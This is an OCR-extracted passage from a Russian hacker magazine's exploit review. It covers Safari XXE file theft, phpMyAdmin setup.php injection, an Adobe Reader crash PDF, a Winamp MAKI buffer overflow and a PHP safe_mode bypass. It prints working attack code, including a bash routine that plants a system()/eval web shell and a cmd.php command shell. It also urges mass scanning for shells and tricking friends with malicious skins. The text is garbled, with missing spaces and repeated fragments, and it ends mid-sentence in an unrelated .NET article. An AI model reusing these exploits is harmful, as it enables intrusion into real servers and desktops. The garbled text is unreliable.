книги хакеры / журнал хакер / 127_Optimized

>>

обзор

эксплоитов

Below you should see the content of a local file, stolen by this evil web page.

<p/>

&ent;

<script>

alert(document.body.innerHTML);

</script>

</body>

</html>

</xsl:template>

</xsl:stylesheet>

Каквидишь, лексема«&ent;» хранитвсебесодержимое«/etc/passwd», которыймагическимобразомотобразитсянаэкране. Еслитысчастливый обладательSafari, можешьпройтитестнавшивостьпоссылкамhttps:// cevans-app.appspot.com/static/safaristealfilebug.xml (MacOS) иhttps:// cevans-app.appspot.com/static/safaristealfilebugwin.xml (Windows).

>> SOLUTION

ОбновлениедоSafari 4.x решитвсепроблемыиустранитугрозывнешнихнападений.

02PHPMYADMIN (/SCRIPTS/SETUP.PHP)

PHP CODE INJECTION EXPLOIT

>> Brief

Давнонаснебаловалихорошимиуязвимостямивпопулярныхпроектах. Сегодняяпостараюсьэтоисправить: 4 июнябагоискателямудалосьобнаружитьизъянвпроектеphpMyAdmin, аименно— вгенераторенастроечныхфайлов«/scripts/setup.php». Сутьбагадовольнопроста: впроцессеустановкиphpMyAdmin происходитгенерацияосновныхпараметров(хоста mysql, логина, пароля, названиябазыит.п.) споследующимихсохранениемв«/config/config.inc.php». Таквот, донедавнеговремениразработчики довольноаккуратнофильтровалинежелательныйконтент, новпоследних версияхчуть-чутьизменилиалгоритм. Витоге, злоумышленникможет передатьядовитыепараметры, позволяющиезаписатьпроизвольныйкод вконфигурационныйфайл. Затем, пообращениюкэтомуконфигу, хакер получитполноценныйWeb-шелл. Атеперьразберемся, какэтопроисходит насамомделе. Вместеспрочимипараметрамивзначениепеременной «host» инжектируется, кпримеру, фраза«phpinfo();//localhost». Навыходе получимвполнеработоспособныйсценарий, выводящийphpinfo(). Помимопрочего, эксплойтпозволяетвнедрить«passthru()» дляпередачи командWeb-шеллуприпомощизначенияпеременной«c».

Нонедумай, чтовсетакпросто. Эксплойтнакладываетнекоторые ограничениянаphpMyAdmin. Во-первых, нужно, чтобыадминистраторустанавливалпроектчерезмастера, аневручную. Во-вторых, необходимоналичиефайла«scripts/setup.php», которыйпочему-то

(интересно, почему? :)) любятудалять. В-третьих, директория«config/» такжедолжнаприсутствовать, анафайл«config.inc.php» должен бытьустановленатрибутзаписи. В-четвертых, намашиненеобходим работоспособныйcurl (сегопомощьюпроисходитинжектирование кода). И, наконец, уязвимымиверсиямиphpMyAdmin являются2.11.x

до2.11.9.5 и3.x до3.1.3.1 (всерелизыдостаточноновыеивыпускались доапреляэтогогода).

Какитог, хакерможетбезтруданаписатьавтосканерphpMyadmin и эксплуатироватькаждыйхост. Намойвзгляд, вероятностьуспехиатаки недалекаот30%, апритакихраскладаходналишьночьсканирования будетприноситьвзломщикуморенелишнихWeb-шеллов.

>> Exploit

Нижеприводитсяключеваяфункцияexploit(), отвечающаязаинжект вредоносногокода.

function exploit {

postdata="token=$1&action=save&configuration="\ "a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22hos t%27]="\ "%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost %22%3bs:9:"\ "%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connec t_type%22%3bs:3:"\ "%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22aut h_type%22%3bs:6:"\ "%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}& eoltype=unix"

postdata2="token=$1&action=save&configuration=a:1:"\ "{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%2 7%5d="\

"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20 %27%3cpre%3e%27%3b"\ "system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/ pre%3e%27%3b}"\ "if(\$_GET%5b%27p%27%5d){echo%20 %27%3cpre%3e%27%3beval"\ "(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/ pre%3e%27%3b}%3b//"\

"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:

6:%22"\ "mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22% 3bs:8:"\

"%22compress%22%3bb:0%3bs:9:%22auth_ type%22%3bs:6:%22config"\ "%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype= unix"

зор

сплоитов

зор

сплоитов

зор

сплоитов

зор

сплоитов

зор

сплоитов

зор

сплоитов

зор

сплоитов

СЕГОДНЯНЕНАШДЕНЬ. ПРИДЕТСЯПИСАТЬАВТОСКАНЕР...

flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html" echo "[+] attempting to inject phpinfo() ..."

curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup. php" >/dev/null

if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null

then

curl -ks --url "$3/config/config.inc.php" >$flag echo "[+] success! phpinfo() injected successfully!

output saved on $flag"

curl -ks -b $2 -d $postdata2 --url "$3/scripts/ setup.php» >/dev/null

echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"

echo " $3/config/config.inc.php?c=ls+-l+/" echo " $3/config/config.inc.php?p=phpinfo();" echo " please send any feedback/improvements for

this script to"\ "unknown.pentester<AT_sign__here>gmail.com"

else

echo "[+] no luck injecting to $3/config/config.inc. php :("

exit

fi

}

ЕслитынеполенишьсянаписатьпростенькийPHP-парсерпередавае- мыхстрок, тополучишьпосимвольнуюкартинуинжекта.

Полныйкодэксплойтаможноскачатьпоссылкеsecuritylab.ru/poc/ extra/381413.php.

>> Targets:

УязвимымиверсиямиphpMyAdmin являются2.11.x до2.11.9.5 и3.x до 3.1.3.1 (всерелизыдостаточноновыеивыпускалисьдоапреляэтого года).

>> Solution

Нависшуюугрозубезопасностирешитлибоудалениефайла«/scripts/ setup.php», либоизолированиекаталога«/config» внеWeb-директории, либо(самыйпредпочтительныйвариант) обновлениеphpMyAdmin до свежейверсии. Последнееможноосуществитьсофициальнойлокации: sourceforge.net/projects/phpmyadmin.

03ADOBE ACROBAT 9.1.1 STACK OVERFLOW CRASH POC EXPLOIT

>> Brief

ОчереднаятемнаялошадканааренеPoC появиласьвначалеиюня. Наэтотраз, позаявлениямнеизвестныхбагоискателей, обнаружилась брешьвAdobe Acrobat аждоверсии9.1.1. Впабликвыложилилишь PoC-эксплойт, призапускекоторогоничегонепроисходит. Точнее, про-

ОШИБКАТУПАЯДОБОЛИ

исходит— вываливаетсясреда, изкоторойбылзапущенPoC. Еслиэто браузер— закрываютсявсевкладкиIE/Firefox/Opera/Mozilla. Еслиэто самAcrobat Reader — тоионвылетает. Корочеговоря, сплойтдействительносшибаетсногAdobe Reader.

Почемужетакпроисходит? Чтобыэтовыяснить, бережноскачаемPDF’ку каким-нибудьстороннимменеджером(яиспользовалwget наудаленномсервере) иприсмотримсякисходномукодуфайла. Дляпростоты восприятия, помещаюегониже.

%PDF-1.4

%

4 0 obj<</ProcSet[/PDF/Text]>>endobj

5 0 obj<</Length 1>>stream endstream

endobj

3 0 obj<</Type/Page/Parent 2 0 R/Contents 5 0 R/MediaBox [0 0 595 842]/Resources 4 0 R>>endobj

2 0 obj<</Type/Pages/Kids [3 0 R ]/Count 1 >>endobj

НЕМЕДЛЕННОЕОБНОВЛЕНИЕ

НАВОЛОСКЕОТСМЕРТИ...

6 0 obj<</S/JavaScript/JS ( 0

function Init\(\) { if \(typeof this.info.ModDate == "object"\) { return true; }app.alert\([[[[[[[[.... * 4098 } Init\(\); )>>endobj

1 0 obj<</Type/Catalog/Pages 2 0 R/OpenAction 6 0 R>>endobj

xref 0 7

0000000000 65535 f

0000020392 00000 n

0000000193 00000 n

0000000098 00000 n

0000000015 00000 n

0000000052 00000 n

0000000245 00000 n trailer

<<

/Size 7 /Root 1 0 R

/ID [<c52946397fbfbe4d5492f9f411a983e2><c52946397fbfbe 4d5492f9f411a983e2>]

>>

startxref 20452 %%EOF

Смотримивидим, чтовсекцииinit естьстранныйalert, содержащий4098 байтмусора. Очевидно, чтоонисталпричинойпадения. Какговорится, доверяй, нопроверяй, поэтомуяотредактировалфайл, оставивлишь10 байт«мусора». Витоге, PDF’каоткрыласьбезошибок.

Каковжевывод? Всепросто, функция«app.alert()» несодержитдолжную проверкунапереполнение, витоге, мыимеембезобидныйDoS. Подчеркиваю, именнобезобидный, посколькувприватныхкругахнаверняка ходитэксплойт, реализующийвыполнениепроизвольногосистемного кода, которыйвпоследствиибудетиспользоватьсявразличныхсвязках для«пробива» приватныхтроянцев. Поэтомумотайинформациюнауси немедленнообновляйся.

ТЕХНИЧЕСКОЕОПИСАНИЕБАГАВLIBSNDFILE

>> Exploit

Вбейвадреснуюстроку«securitylab.ru/_download/exploits/2009/05/ adobe-reader-dos.pdf» иувидишь... аварийноезакрытиебраузера:).

>> Targets

УязвимымиявляютсявсеверсииAcrobat Reader, включаярелиз9.1.1. Помни, чтоеслитыжмякнешьнассылкусядовитымPDF-файлом, захлопнетсяипрограмма, котораяинициировалаегооткрытие.

>> Solution

Обновляйчиталкунаофициальномсайте«get.adobe.com/reader». Тем самымтызащитишьсвойкомпьютеротнепрошеныхгостей.

зор

сплоитов

зор

сплоитов

зор

сплоитов

зор

сплоитов

зор

сплоитов

зор

сплоитов

зор

сплоитов

НИКЧЕМУНЕОБЯЗЫВАЮЩИЙЭКСПЛОЙТДЛЯWINAMP

04 WINAMP BUFFER OWERFLOW

MULTIPLE EXPLOITS

>> Brief:

Наэтотразнеобошлосьбезмузыкальныхжертв— подприцелбагоиска-

телейпопалсамыйпопулярныйWindows-player — Winamp отNullsoft.

Заодинлишьмесяцвнембылонайденодвегромкихуязвимости, о которыхяспешутеберассказать.

1.Какяужеписал, всепродуктыбазируютсянакаких-либокомпонент- ныхбиблиотеках. Иесливсофтепрактическиидеальныйкод, тоуязвимостьможетнаходитьсявовспомогательнойбиблиотеке. Особенно тяжелоположение, еслиисходникибиблиотекизакрыты(соднойстороны, сложнонайтиуязвимость, носдругой— никтоотнеевпринципене застрахован:)). НовслучаесWinamp — багтривиален. Умельцынашли изъянвфункциях«voc_read_header()» и«aiff_read_header()», принадле-

жащихбиблиотеке«libsndfile» ичитающихзаголовки«.voc»- и«.aiff»- файлов(по-видимому, обефункциинаписаныпоодномуалгоритму). Есливеритьэкспертам, вэтихфункцияхсодержитсякод, приводящийк переполнениюдинамическойпамяти. Какследствие, любойжелающий можетсоздать«.voc» или«.aiff»-файлсоспециальнымзаголовком, послечегоWinamp послушновыполнитпроизвольныйсистемныйкод.

Ксожалению, всеограничилосьсловами, исплойтниктотакиневыложил. Однакоутебяимеетсявсяинформациякразмышлению, чтобы написатьсобственныйсплойт(перерывайстарыеподшивкижурналаи смотристатьиКриса— поподобнымнаводкамонэтоделалнераз;)).

2.Ответьмненапростойвопрос: «ЛюбишьлитыскиныWinamp, каклюблюихя?». Насамомделе, шучу, нобыловремя, когдаячасамиизучал различныешкуркиотпроигрывателя, останавливаясьнасамомлучшем. Думаю, исейчасестьфанатымодныхскинов... Гхм, кчемуэтоя? :) Короче говоря, совсемнедавнообнаружиливозможностьпереполнениябуфера впарсере«MAKI» (библиотекаgen_ff.dll). Maki — это, собственно, иесть скриптыWinamp’а, образующиескин(привязкукнопок, функционал

ит.п.). Еслиуглубитьсявтехническиеподробности, будетпонятно, что механизмпарсинга.maki состоитвпоследовательномчтениидвухбайт, отвечающихзадлину. Есличутьувеличитьэтудлину, произойдет... правильно— переполнениестекаиаварийноезавершениепрограммы. А есличутокподуматьиувеличитьдлинусумом, мыдобьемсяперезаписи адресавозвратаивыполнениепроизвольногосистемногокода. Чтои происходитвэксплойте.

payload = "\x41»*16756 payload += "\x74\x06\x90\x90"

payload += "\x32\x55\xF0\x12" # universal p/p/r in_mod. dll

payload += shellcode # calc shellcode from metasploit

Вэтомфрагментеэксплойтапроисходитсмещениестрокинаадрес шеллкода, которыйуспешновызоветсяпослеобработки.maki-файла.

Если«отдебажить» парсинг.maki-файла, томыполучимследующую картину:

.text:12094F62 loc_12094F62:

.text:12094F62 mov ax, [ebx]

.text:12094F65 movsx edi, ax ; sign extension

.text:12094F68 inc ebx

.text:12094F69 push edi ; Size

.text:12094F6A inc ebx

.text:12094F6B lea eax, [ebp+MultiByteStr]

.text:12094F71 push ebx ; Src

.text:12094F72 push eax ; Dst, buffer is located in the stack

.text:12094F73 call memmove

.text:120951E5 loc_120951E5:

.text:120951E5 mov edi, [ebx]

.text:120951E7 add ebx, 4

.text:120951EA mov ax, [ebx]

.text:120951ED movsx esi, ax ; sign extension

.text:120951F0 inc ebx

.text:120951F1 push esi ; Size

.text:120951F2 inc ebx

.text:120951F3 lea eax, [ebp+var_10144]

.text:120951F9 push ebx ; Src

.text:120951FA push eax ; Dst, buffer is located in the stack

.text:120951FB call memmove

Всеиспытанияпроводилисьнаскинеот«Big Bento», которыйты можешьнайтинаофициальномсайте. Файлmcvcore.maki находитсяв

«PROGRAMFILES/Winamp/Skins/Bento/Scripts». Атеперьподумай, что будет, еслиаккуратновпаритьякобыкрутойскинсвоемусотоварищу? Правильно! Ноятебеэтогонеговорил:).

>> Targets

Уязвимымисчитаются:

1.Библиотека«libsndfile» доверсии<= 1.0.20, активноиспользующаяся вWinamp.

2.СамWinamp доверсии<= 5.55.

>> Solution

Зайдина«winamp.com» иобновисьдопоследнегорелиза. Благодаря своевременномуоповещениюразработчиков, багбылисправленвтот жедень. Хорошоэтоилинет— незнаю, новлюбомслучаевСетиеще осталосьогромноеколичествоуязвимыхверсий.

>> Exploit:

Попервомубагу, какяужесказал, эксплойтаниктонепредоставил. Зато повторому— ихцелыхдва. ОдиннаписаннаСи(securitylab.ru/poc/ extra/380450.php), авторойнаПитоне(securitylab.ru/poc/extra/380454. php).

05 PHP <= 5.2.9 LOCAL SAFEMOD BYPASS EXPLOIT (WIN32)

>> Brief:

Нашлась дырка и в самой свежей версии PHP, позволяющая осуществить обход ограничений «safe_mode». Напомню, что взведенная в php.ini опция «safe_mode» не позволяет инклудить файлы, выполнять системные вызовы и т.п. Но багоискатели нашли способ выполнения команд при включенном

>>

«safe_mode». Правда, только на Windows-платформах. Почему тольконаWindows?

Дело в том, что баг актуален лишь в силу специфики OS и был пропущен из-за кроссплатформенности PHP. Все дело в слэшах. Если в *nix-like системах «/usr/bin/php» и «\usr\bin\php» будут считаться совершенно разными строками (мало того, вторая строка вернет тебе ошибку), то Windows сочтет их вполне одинаковыми. К слову, это является одним из признаков характеристики целевой системы при ее изучении (Remote OS Fingerprinting). Например, если перед нами система со сбитыми TTL, Windows Size, а также модифицированным сетевым стеком, и у нас есть доступ к FTP или Web-Server’у, то можно сразу опознать Windows всего лишь по двум запросам к файлу. Эксплойт, совсемнедавноопубликованныйкомандойAbysssec (abyssses.com), представляетсобойдвафайла: php-сценарий«cmd. php» иисполняемый«cmd.bat» (можнобылореализоватьбагсиспользованиемодногофайла, нудаладно).

Ключевойфрагментсплойтатакой:

$cmd = $_REQUEST[‘cmd’]; if ($cmd){

$batch = fopen ("cmd.bat","w"); fwrite($batch,"$cmd>abysssec.txt"."\r\n"); fwrite($batch,"exit");

fclose($batch); exec("\start cmd.bat"); echo "<center>";

echo "<h1>Abysssec.com PHP 5.x SafeMod Bypasser</h1>";

echo "<textarea rows=20 cols=60>"; require("abysssec.txt");

echo "</textarea>"; echo "</center>";

Каквидишь, весьбагсводитсяктому, что«safe_mode» пропускает конструкцию«\start cmd.bat», начинающуюсяссимвола«\». Команда записываетсяв«cmd.bat», которыйвыводитеерезультатвтекстовик. А текстовыйфайл, всвоюочередь, отображаетсянаэкране. Воттакойвот геморрой:).

>> Exploits

Эксплойтберемпоадресуabysssec.com/safemod-windows.zip или milw0rm.com/sploits/2009-safemod-windows.zip. Описаниекэксплойту

(менееподробное, чемвэтомобзоре) можноизучитьпоссылкеs3curi7y. org/local.php?id=7.

>> Targets:

УязвимымиявляютсявсеверсииPHP, нопомни, чтоинтерпретатор долженбытьустановленнаWindows-платформе. АкакпроверитьOS, ты ужезнаешь.

>> Solution:

Вданныймоментуязвимостьнеустранена. Ноеслипозарезнужноизбавитьсяотбага, простозапретифункцию«exec()» илинапишипарсер, убивающийвсебоковыеслеши.z

>> взлом

ЗАГАДОЧНЫЙФРЕЙМВОРК

Говоряо.NET,следуетпризнать,чтовMicrosoft вовсенедуракиработают,ииногдавнедрах корпорациирождаютсяпоистинеинтересные решения.Янебудувдаватьсявподробности относительнопротивостояния.NETиJava, проводитьдетальныесравненияимерятьсявсем, чемможно.Фактналицо—.NETразвиваетсяи ужевключенвофициальнуюпоставкуновыхОС

(Vista/2008/7)отMicrosoft.Microsoftпредостав-

ляетнетолькосредыразработкииисполнения, ноибогатыебиблиотекиклассов,позволяющие реализоватьпрактическилюбойфункционал пользовательскогоприложения.Совместнос

Hewlett-PackardиIntelбылистандартизованы CLI,C#иC++/CLI(ECMA-335,ECMA-334,ECMA- 372,соответственно).Этооткрылодорогудля NovellсихпроектомMono,реализующимданные стандартыипозволяющимзапускатьприложения.NETнадругих,безоконныхоперационных системах.Microsoftделаетставкуна.NETкакна лидирующуюсредудлясозданияприложенияпод ОСWindows,а,значит,инамследуетотнестись кнейсуважениеминаучитьсясправлятьсяс потенциальнымитрудностями.Однимизнесомненныхпреимуществ.NETявляетсяподдержка несколькихязыковпрограммирования.Впервую очередь,этозаостренныйC(C#)и,конечноже,

BasicвформатеVB.NET.Врамкаходногопроекта можнокомбинироватьсборки,разработанные наразличныхязыках.Средасамаобеспечит корректностьисполненияконечногорешения. Какимжеобразомэтодостигается?Реализованы концепциипесочницы,CLIиJIT.

ОЛЬГА, ПРОЩАЙ!

Насамомделе,вседостаточнопросто(здесь опятьможновспомнитьоJava,номыэтогоделать небудем).Независимостьотязыкапрограммированияиотконечнойплатформыдостигается засчеткомпиляцииприложенияневнативный, авпромежуточныйбайт-код.Втерминологии